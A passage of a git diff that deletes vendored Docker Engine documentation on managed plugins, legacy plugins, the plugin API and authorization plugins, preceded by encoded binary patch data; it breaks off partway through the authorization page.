z%q+__?P5sCBq7J;=0d*!f;531Xl$vV;nh=XgYGry^6Nf-JS4sLtHNJ5BBUt|j5~s4 z$|U4xai5T~h|0FZ5~SGWgQ%{fmi5&cWejNNvAp`|rSba8wgvDLm03G=R+n*q1xN_| zi|GKz1bpTW(7dbq_fo+G2F*x`h}ul`(kv!`CZxXv<$pn5*gRJnzPBq#&r13YkZM>; zU)=cjNym$`EFY2|?QmwyuK-ueaeA`%IvoxAQ&Fp(qkjqu=_gPMUy=++dtUUg`u;I*$=w}!?d!YT5m+bu5?qx_K>ubudLPXe z=o5_$7Mh-^g7b9BMp^0YwJ=Uy{|NM&3Y@z;gXn^eb`}9GgFqj!+Y<=ruR8x85qb)` zPCjt=0WaA;A{-tVJdFbm$9K^&Ioo(EjZo=l3k8T-r-2`VOp>}vUbxc$sCfAZ&x!41 zLd3xG_gHP|6YVm4-~f#fw4E7`3`Lq!8_#@va6t2|HZ7wwoqnH%uv3=iQ)=I3o7vT= zRwEdfi!v_*;->AMhBF+k4`;f%pp&m&HN|}!tz*u|G`aVr4C=S82;%w2@`5v=9+SxW z(T`3nJ-B7>R0cWCTm zz@|tqjje&?>#al>>21Pco_UXGGYA-c+DUxgF4JR6{3Y->#bBuOf}IC3_ChqE8PSCh z6{!&vCwvOQ=KZg`yXynk$N}~rtf%|IG73v_h_)A{afE%tF!Q7k8tV;Rr9r5J& z+GW+~-mx{%KN$!L@`Pd=;9^WZW44Jqbgpm~+xy?k0nW2HM_?wB=P?KD%!7q=w-f~V z>%hr%JRDi9(<}uoZ`dCQf%}U`q1mjgURr6tO1Z~|mBWpAIC&fhn(@!LD=QxY+{jDs zez-%|@%Tcw_XCGNLhql^pDPRclp%d|QB~(3@;)KU-o<;|N;&&o#N-@`Y8whj_m;ty zYGgas2Uv(E2lJ~##J`@=^ZH&MKFWHXra+H&+mjl3^j!LuV3EHQ(Jq?sX4O2b{>$E7 
zm^*_eReMx+50g*(XtHCdFW*Vl_7)ZAWm&C8!}@bEM_OH%mcc9a4xCmMW-L|HR7Q5F zrly3%{ zgkR!PJLS>`6*}vv*_(MFkHk{p>+OituLG^<>S3bvhP*t_5pE?uznem<;Qy}Df2*>7 zEqvheaF`d#a1ClCSRA~#ecwI4z6#eSau?pO?u*!UDNB<3@G;!21)llk*8KT7QiJzm zVSR$CkBlT*IS*bK3Ub`%T2_3e6tSb#-0eI*mv6l~(a1nFd>}<)ibd3oZv#>XTzwx~ zwi^n~52Ky>t_ui0}-pv>G!{?qOzlmV;%-cz6rV7hO3hZnQ z!xQsdy6QK`({ljQaLZLC*LCFh5O(}7hn(#CR`cql4$ZI`?=d81w2^$5e@1n&?52=g z=m2VrEVqM28oRhu2NbcbohcndJ8+nH>IvQvJJrjG{S*?onOvL&ED;|s<~czwBOQMu zsp)<5AJ2+i=wLo~txKU7beb@eze8BQKoGD79VP(-~6OPt;WJ zPr~?y%B-~$iy9`{m`$KQN;od(uxh&72XyX)*5wwRWWzWksU=Ex{LbEeLha(@U+wp4 zciVv=aX?pLw8%ufe@l1kk>J$4ND5{!qJGi_tGTLDbdV2u2=iyybgKW#K}xYyVf{_d z5oOt6;qERQ@Z4cPl4Y(0(#>6{Nio4VpN!d6+H$?}W{p4HY-+iCsg23-h z&@6uS`(La0KkVaH#NRUt%&xnvu{4RU2+z5`&{{obsF|bb= z3nc_bG&Rs~q$|8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47 zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7 zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*XM5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P z&5aT!#!zt7#imRLi{-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6 zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki zl_W7cJp@qzlAqdSg&Tg>M6(UM{s17n?fL`2 zQ`z?KuL+LZiESx_$iskC!!8WK7|qb(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao zHA%3@c#VWD%Oo`U9Aj-qsU*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97 z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ 
zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9 zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E> z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPuxGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ z=$$n@4<&GfA09%kRf*F+3l) z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q| zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_ zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts< zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-waR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$viMrOop?yq{o*Jp5Kep4{aAv%Brru zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{ z%zR3Rjnn_?r|qwIiT8{b6H46q{d<;; ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5 zc0fm# zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|$BNjL^mJWeVPTyc(VpE> z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a& zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U z=EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK 
z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW z7>mVHV|IJB - -# Docker Engine managed plugin system - -* [Installing and using a plugin](index.md#installing-and-using-a-plugin) -* [Developing a plugin](index.md#developing-a-plugin) - -Docker Engine's plugins system allows you to install, start, stop, and remove -plugins using Docker Engine. This mechanism is currently only available for -volume drivers, but more plugin driver types will be available in future releases. - -For information about the legacy plugin system available in Docker Engine 1.12 -and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md). - -> **Note**: Docker Engine managed plugins are currently not supported -on Windows daemons. - -## Installing and using a plugin - -Plugins are distributed as Docker images and can be hosted on Docker Hub or on -a private registry. - -To install a plugin, use the `docker plugin install` command, which pulls the -plugin from Docker hub or your private registry, prompts you to grant -permissions or capabilities if necessary, and enables the plugin. - -To check the status of installed plugins, use the `docker plugin ls` command. -Plugins that start successfully are listed as enabled in the output. - -After a plugin is installed, you can use it as an option for another Docker -operation, such as creating a volume. - -In the following example, you install the `sshfs` plugin, verify that it is -enabled, and use it to create a volume. - -1. Install the `sshfs` plugin. - - ```bash - $ docker plugin install vieux/sshfs - - Plugin "vieux/sshfs" is requesting the following privileges: - - network: [host] - - capabilities: [CAP_SYS_ADMIN] - Do you grant the above permissions? [y/N] y - - vieux/sshfs - ``` - - The plugin requests 2 privileges: - - It needs access to the `host` network. - - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run - the `mount` command. - -2. 
Check that the plugin is enabled in the output of `docker plugin ls`. - - ```bash - $ docker plugin ls - - ID NAME TAG DESCRIPTION ENABLED - 69553ca1d789 vieux/sshfs latest the `sshfs` plugin true - ``` - -3. Create a volume using the plugin. - This example mounts the `/remote` directory on host `1.2.3.4` into a - volume named `sshvolume`. This volume can now be mounted into containers. - - ```bash - $ docker volume create \ - -d vieux/sshfs \ - --name sshvolume \ - -o sshcmd=user@1.2.3.4:/remote - - sshvolume - ``` -4. Verify that the volume was created successfully. - - ```bash - $ docker volume ls - - DRIVER NAME - vieux/sshfs sshvolume - ``` - -5. Start a container that uses the volume `sshvolume`. - - ```bash - $ docker run -v sshvolume:/data busybox ls /data - - - ``` - -To disable a plugin, use the `docker plugin disable` command. To completely -remove it, use the `docker plugin remove` command. For other available -commands and options, see the -[command line reference](../reference/commandline/index.md). - -## Service creation using plugins - -In swarm mode, it is possible to create a service that allows for attaching -to networks or mounting volumes. Swarm schedules services based on plugin availability -on a node. In this example, a volume plugin is installed on a swarm worker and a volume -is created using the plugin. In the manager, a service is created with the relevant -mount options. It can be observed that the service is scheduled to run on the worker -node with the said volume plugin and volume. - -In the following example, node1 is the manager and node2 is the worker. - -1. Prepare manager. In node 1: - - ```bash - $ docker swarm init - Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager. - ``` - -2. Join swarm, install plugin and create volume on worker. 
In node 2: - - ```bash - $ docker swarm join \ - --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \ - 192.168.99.100:2377 - ``` - - ```bash - $ docker plugin install tiborvass/sample-volume-plugin - latest: Pulling from tiborvass/sample-volume-plugin - eb9c16fbdc53: Download complete - Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639 - Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest - Installed plugin tiborvass/sample-volume-plugin - ``` - - ```bash - $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol - ``` - -3. Create a service using the plugin and volume. In node1: - - ```bash - $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top - - $ docker service ls - z1sj8bb8jnfn my-service replicated 1/1 busybox:latest - ``` - docker service ls shows service 1 instance of service running. - -4. Observe the task getting scheduled in node 2: - - ```bash - $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' - 83fc1e842599 Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top" - ``` - -## Developing a plugin - -#### The rootfs directory -The `rootfs` directory represents the root filesystem of the plugin. In this -example, it was created from a Dockerfile: - ->**Note:** The `/run/docker/plugins` directory is mandatory inside of the -plugin's filesystem for docker to communicate with the plugin. - -```bash -$ git clone https://github.com/vieux/docker-volume-sshfs -$ cd docker-volume-sshfs -$ docker build -t rootfsimage . -$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created -$ sudo mkdir -p myplugin/rootfs -$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs -$ docker rm -vf "$id" -$ docker rmi rootfsimage -``` - -#### The config.json file - -The `config.json` file describes the plugin. 
See the [plugins config reference](config.md). - -Consider the following `config.json` file. - -```json -{ - "description": "sshFS plugin for Docker", - "documentation": "https://docs.docker.com/engine/extend/plugins/", - "entrypoint": ["/go/bin/docker-volume-sshfs"], - "network": { - "type": "host" - }, - "interface" : { - "types": ["docker.volumedriver/1.0"], - "socket": "sshfs.sock" - }, - "capabilities": ["CAP_SYS_ADMIN"] -} -``` - -This plugin is a volume driver. It requires a `host` network and the -`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs` -entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate -with Docker Engine. This plugin has no runtime parameters. - -#### Creating the plugin - -A new plugin can be created by running -`docker plugin create ./path/to/plugin/data` where the plugin -data contains a plugin configuration file `config.json` and a root filesystem -in subdirectory `rootfs`. - -After that the plugin `` will show up in `docker plugin ls`. -Plugins can be pushed to remote registries with -`docker plugin push `. diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md deleted file mode 100644 index 6ac914e366..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md +++ /dev/null @@ -1,98 +0,0 @@ ---- -redirect_from: -- "/engine/extend/plugins/" -title: "Use Docker Engine plugins" -description: "How to add additional functionality to Docker with plugins extensions" -keywords: "Examples, Usage, plugins, docker, documentation, user guide" ---- - - - -# Use Docker Engine plugins - -This document describes the Docker Engine plugins generally available in Docker -Engine. To view information on plugins managed by Docker, -refer to [Docker Engine plugin system](index.md). - -You can extend the capabilities of the Docker Engine by loading third-party -plugins. 
This page explains the types of plugins and provides links to several -volume and network plugins for Docker. - -## Types of plugins - -Plugins extend Docker's functionality. They come in specific types. For -example, a [volume plugin](plugins_volume.md) might enable Docker -volumes to persist across multiple Docker hosts and a -[network plugin](plugins_network.md) might provide network plumbing. - -Currently Docker supports authorization, volume and network driver plugins. In the future it -will support additional plugin types. - -## Installing a plugin - -Follow the instructions in the plugin's documentation. - -## Finding a plugin - -The sections below provide an inexhaustive overview of available plugins. - - - -### Network plugins - -Plugin | Description ------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -[Contiv Networking](https://github.com/contiv/netplugin) | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards. -[Kuryr Network Plugin](https://github.com/openstack/kuryr) | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well. 
-[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/) | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity. - -### Volume plugins - -Plugin | Description ------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver) | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/). -[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume) | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS. -[Contiv Volume Plugin](https://github.com/contiv/volplugin) | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS. -[Convoy plugin](https://github.com/rancher/convoy) | A volume plugin for a variety of storage back-ends including device mapper and NFS. 
It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore. -[DRBD plugin](https://www.drbd.org/en/supported-projects/docker) | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes. -[Flocker plugin](https://clusterhq.com/docker-plugin/) | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines. -[gce-docker plugin](https://github.com/mcuadros/gce-docker) | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks). -[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs) | A volume plugin that provides multi-host volumes management for Docker using GlusterFS. -[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux) | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3. -[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/) | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays. -[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs) | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume. -[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz) | A plugin that provides credentials and secret management using Keywhiz as a central repository. 
-[Local Persist Plugin](https://github.com/CWSpear/local-persist) | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`. -[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP) | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future. -[Netshare plugin](https://github.com/ContainX/docker-volume-netshare) | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems. -[OpenStorage Plugin](https://github.com/libopenstorage/openstorage) | A cluster-aware volume plugin that provides volume management for file and block storage solutions. It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few. -[Portworx Volume Plugin](https://github.com/portworx/px-dev) | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler. -[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume) | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform. -[REX-Ray plugin](https://github.com/emccode/rexray) | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC. 
-[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices. -[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere) | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments. - -### Authorization plugins - - Plugin | Description -------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ - [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name). - -## Troubleshooting a plugin - -If you are having problems with Docker after loading a plugin, ask the authors -of the plugin for help. The Docker team may not be able to assist you. - -## Writing a plugin - -If you are interested in writing a plugin for Docker, or seeing how they work -under the hood, see the [docker plugins reference](plugin_api.md). 
diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md deleted file mode 100644 index 693b77a2f3..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugin_api.md +++ /dev/null @@ -1,196 +0,0 @@ ---- -title: "Plugins API" -description: "How to write Docker plugins extensions " -keywords: "API, Usage, plugins, documentation, developer" ---- - - - -# Docker Plugin API - -Docker plugins are out-of-process extensions which add capabilities to the -Docker Engine. - -This document describes the Docker Engine plugin API. To view information on -plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md). - -This page is intended for people who want to develop their own Docker plugin. -If you just want to learn about or use Docker plugins, look -[here](legacy_plugins.md). - -## What plugins are - -A plugin is a process running on the same or a different host as the docker daemon, -which registers itself by placing a file on the same docker host in one of the plugin -directories described in [Plugin discovery](#plugin-discovery). - -Plugins have human-readable names, which are short, lowercase strings. For -example, `flocker` or `weave`. - -Plugins can run inside or outside containers. Currently running them outside -containers is recommended. - -## Plugin discovery - -Docker discovers plugins by looking for them in the plugin directory whenever a -user or container tries to use one by name. - -There are three types of files which can be put in the plugin directory. - -* `.sock` files are UNIX domain sockets. -* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`. -* `.json` files are text files containing a full json specification for the plugin. - -Plugins with UNIX domain socket files must run on the same docker host, whereas -plugins with spec or json files can run on a different host if a remote URL is specified. 
- -UNIX domain socket files must be located under `/run/docker/plugins`, whereas -spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`. - -The name of the file (excluding the extension) determines the plugin name. - -For example, the `flocker` plugin might create a UNIX socket at -`/run/docker/plugins/flocker.sock`. - -You can define each plugin into a separated subdirectory if you want to isolate definitions from each other. -For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only -mount `/run/docker/plugins/flocker` inside the `flocker` container. - -Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under -`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as -soon as it finds the first plugin definition with the given name. - -### JSON specification - -This is the JSON format for a plugin: - -```json -{ - "Name": "plugin-example", - "Addr": "https://example.com/docker/plugin", - "TLSConfig": { - "InsecureSkipVerify": false, - "CAFile": "/usr/shared/docker/certs/example-ca.pem", - "CertFile": "/usr/shared/docker/certs/example-cert.pem", - "KeyFile": "/usr/shared/docker/certs/example-key.pem" - } -} -``` - -The `TLSConfig` field is optional and TLS will only be verified if this configuration is present. - -## Plugin lifecycle - -Plugins should be started before Docker, and stopped after Docker. For -example, when packaging a plugin for a platform which supports `systemd`, you -might use [`systemd` dependencies]( -http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to -manage startup and shutdown order. - -When upgrading a plugin, you should first stop the Docker daemon, upgrade the -plugin, then start Docker again. - -## Plugin activation - -When a plugin is first referred to -- either by a user referring to it by name -(e.g. 
`docker run --volume-driver=foo`) or a container already configured to -use a plugin being started -- Docker looks for the named plugin in the plugin -directory and activates it with a handshake. See Handshake API below. - -Plugins are *not* activated automatically at Docker daemon startup. Rather, -they are activated only lazily, or on-demand, when they are needed. - -## Systemd socket activation - -Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers) -natively supports socket activation. In order for a plugin to be socket activated it needs -a `service` file and a `socket` file. - -The `service` file (for example `/lib/systemd/system/your-plugin.service`): - -``` -[Unit] -Description=Your plugin -Before=docker.service -After=network.target your-plugin.socket -Requires=your-plugin.socket docker.service - -[Service] -ExecStart=/usr/lib/docker/your-plugin - -[Install] -WantedBy=multi-user.target -``` -The `socket` file (for example `/lib/systemd/system/your-plugin.socket`): - -``` -[Unit] -Description=Your plugin - -[Socket] -ListenStream=/run/docker/plugins/your-plugin.sock - -[Install] -WantedBy=sockets.target -``` - -This will allow plugins to be actually started when the Docker daemon connects to -the sockets they're listening on (for instance the first time the daemon uses them -or if one of the plugin goes down accidentally). - -## API design - -The Plugin API is RPC-style JSON over HTTP, much like webhooks. - -Requests flow *from* the Docker daemon *to* the plugin. So the plugin needs to -implement an HTTP server and bind this to the UNIX socket mentioned in the -"plugin discovery" section. - -All requests are HTTP `POST` requests. - -The API is versioned via an Accept header, which currently is always set to -`application/vnd.docker.plugins.v1+json`. - -## Handshake API - -Plugins are activated via the following "handshake" API call. 
- -### /Plugin.Activate - -**Request:** empty body - -**Response:** -``` -{ - "Implements": ["VolumeDriver"] -} -``` - -Responds with a list of Docker subsystems which this plugin implements. -After activation, the plugin will then be sent events from this subsystem. - -Possible values are: - -* [`authz`](plugins_authorization.md) -* [`NetworkDriver`](plugins_network.md) -* [`VolumeDriver`](plugins_volume.md) - - -## Plugin retries - -Attempts to call a method on a plugin are retried with an exponential backoff -for up to 30 seconds. This may help when packaging plugins as containers, since -it gives plugin containers a chance to start up before failing any user -containers which depend on them. - -## Plugins helpers - -To ease plugins development, we're providing an `sdk` for each kind of plugins -currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers). diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md deleted file mode 100644 index ac1837f754..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md +++ /dev/null @@ -1,260 +0,0 @@ ---- -title: "Access authorization plugin" -description: "How to create authorization plugins to manage access control to your Docker daemon." -keywords: "security, authorization, authentication, docker, documentation, plugin, extend" -redirect_from: -- "/engine/extend/authorization/" ---- - - - -# Create an authorization plugin - -This document describes the Docker Engine plugins generally available in Docker -Engine. To view information on plugins managed by Docker Engine, -refer to [Docker Engine plugin system](index.md). - -Docker's out-of-the-box authorization model is all or nothing. Any user with -permission to access the Docker daemon can run any Docker client command. The -same is true for callers using Docker's Engine API to contact the daemon. 
If you -require greater access control, you can create authorization plugins and add -them to your Docker daemon configuration. Using an authorization plugin, a -Docker administrator can configure granular access policies for managing access -to Docker daemon. - -Anyone with the appropriate skills can develop an authorization plugin. These -skills, at their most basic, are knowledge of Docker, understanding of REST, and -sound programming knowledge. This document describes the architecture, state, -and methods information available to an authorization plugin developer. - -## Basic principles - -Docker's [plugin infrastructure](plugin_api.md) enables -extending Docker by loading, removing and communicating with -third-party components using a generic API. The access authorization subsystem -was built using this mechanism. - -Using this subsystem, you don't need to rebuild the Docker daemon to add an -authorization plugin. You can add a plugin to an installed Docker daemon. You do -need to restart the Docker daemon to add a new plugin. - -An authorization plugin approves or denies requests to the Docker daemon based -on both the current authentication context and the command context. The -authentication context contains all user details and the authentication method. -The command context contains all the relevant request data. - -Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md). -Each plugin must reside within directories described under the -[Plugin discovery](plugin_api.md#plugin-discovery) section. - -**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication -respectively. - -## Default user authorization mechanism - -If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name. 
-That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`. - -## Basic architecture - -You are responsible for registering your plugin as part of the Docker daemon -startup. You can install multiple plugins and chain them together. This chain -can be ordered. Each request to the daemon passes in order through the chain. -Only when all the plugins grant access to the resource, is the access granted. - -When an HTTP request is made to the Docker daemon through the CLI or via the -Engine API, the authentication subsystem passes the request to the installed -authentication plugin(s). The request contains the user (caller) and command -context. The plugin is responsible for deciding whether to allow or deny the -request. - -The sequence diagrams below depict an allow and deny authorization flow: - -![Authorization Allow flow](images/authz_allow.png) - -![Authorization Deny flow](images/authz_deny.png) - -Each request sent to the plugin includes the authenticated user, the HTTP -headers, and the request/response body. Only the user name and the -authentication method used are passed to the plugin. Most importantly, no user -credentials or tokens are passed. Finally, not all request/response bodies -are sent to the authorization plugin. Only those request/response 